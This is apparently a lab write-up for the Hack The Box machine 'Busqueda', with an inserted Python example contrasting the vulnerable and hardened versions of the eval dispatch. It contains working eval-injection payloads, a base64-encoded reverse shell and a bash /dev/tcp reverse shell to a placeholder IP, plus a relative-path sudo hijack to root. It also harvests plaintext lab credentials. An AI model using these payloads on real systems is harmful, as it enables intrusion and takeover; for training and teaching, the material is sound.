Busqueda
Write up for the HTB machine 'Busqueda'
1. Initial Recon
1.1. nikto
nikto reveals the hostname searcher.htb
-> add this to /etc/hosts
1.2. nmap
cmd: nmap -sC -sV 10.10.11.208
Open ports: 22 (SSH), 80 (HTTP, Apache)
1.3. domain recon
At the bottom of the page we can see that the web application is powered by Searchor 2.4.0,
which contains an RCE vulnerability; the relevant code change can be seen at: https://github.com/ArjunSharda/Searchor/pull/130/files
If we capture the request using Burp Suite, we can replace the query parameter of the POST request with the following Python code to achieve RCE:
a',print(eval('__import__(\"subprocess\").getoutput(\"pwd\")')))#
Encoding our reverse shell using base64:
a',print(eval('__import__(\"subprocess\").getoutput(\"echo c2ggLWkgPiYgL2Rldi90Y3Ave0lQfS80NDQ0IDA+JjE= | base64 -d | bash \")')))#
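As an added example (not code from this write-up or from Searchor itself), here is the eval-based dispatch pattern behind this bug, written in Python beside a hardened version that treats the query as data; the Engine class, its URLs and the function names are assumptions for illustration. The crafted query only appends to a canary list, which is enough to show which version executes user input.

```python
# Added example (not Searchor's code): the pre-fix dispatch pattern that made
# Searchor 2.4.0 injectable, beside the hardened form. Engine, its URLs and the
# function names are assumptions for illustration only.
from enum import Enum
from urllib.parse import quote_plus

# Canary list: a crafted query that executes code appends to it, so we can tell
# whether untrusted input ran as code without spawning anything.
INJECTED = []


class Engine(Enum):
    GOOGLE = "https://www.google.com/search?q="
    BING = "https://www.bing.com/search?q="

    def search(self, query: str, copy_url: bool = False) -> str:
        # The query is treated as data and URL-encoded.
        return self.value + quote_plus(query)


def search_vulnerable(engine: str, query: str, copy: bool = False) -> str:
    # Vulnerable pattern: user input is spliced into source text and eval'd.
    # A quote inside `query` closes the string literal, the rest becomes Python,
    # and a trailing '#' comments out whatever source followed it.
    return eval(f"Engine.{engine}.search('{query}', copy_url={copy})")


def search_hardened(engine: str, query: str, copy: bool = False) -> str:
    # Hardened form in the spirit of the fix: look the engine up by name and
    # pass the query as an argument; no user-controlled text is ever parsed.
    try:
        member = Engine[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return member.search(query, copy_url=copy)


def run_crafted_query(engine: str, crafted: str) -> dict:
    """Feed one crafted query to both dispatchers and report what each did."""
    INJECTED.clear()
    vulnerable_url = search_vulnerable(engine, crafted)
    ran_in_vulnerable = list(INJECTED)
    INJECTED.clear()
    hardened_url = search_hardened(engine, crafted)
    return {
        "vulnerable_url": vulnerable_url,
        "vulnerable_executed": ran_in_vulnerable,
        "hardened_url": hardened_url,
        "hardened_executed": list(INJECTED),
    }
```

Calling run_crafted_query("GOOGLE", "a',INJECTED.append('ran'))#") uses the same shape as the write-up's payload: the vulnerable dispatcher runs the injected append, while the hardened one just returns a URL with the whole string percent-encoded.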
After catching our reverse shell with a netcat listener, we can do some recon on the file system of the web application.
/var/www/app/.git/config
contains credentials for a Gitea instance in the following remote URL: http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
cody:jh1usoih2bkjaspwe92
2. Privilege Escalation
The password jh1usoih2bkjaspwe92
is reused as the SSH password and the sudo password, so we no longer need our reverse shell.
sudo -l
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
Add gitea.searcher.htb
to /etc/hosts
and log into Gitea as cody with the credentials above.
Looking through the Gitea repository, we can see that there is an administrator user.
Its credentials are found using the docker-inspect subcommand that our user svc is allowed to run with sudo:
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' f84a6b33fb5a
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' 960873171e2e
Log into Gitea using
administrator:yuiu1hoiu4i5ho1uh
In Gitea we can see in system-checkup.py
that a script called ./full-checkup.sh
is run by one of the subcommands, using a path relative to the current working directory rather than an absolute path.
If we create our own ./full-checkup.sh
in any directory other than /opt/scripts/
and run the above sudo command from the directory holding our script, our script is run instead of the intended one.
So we place a ./full-checkup.sh
with the following bash code for another reverse shell, but this time we will be root :)
#!/bin/bash
echo "hello root"
bash -i >& /dev/tcp/{IP}/4444 0>&1
Finally, run the sudo command with the full-checkup option while a netcat listener is waiting to catch the reverse shell.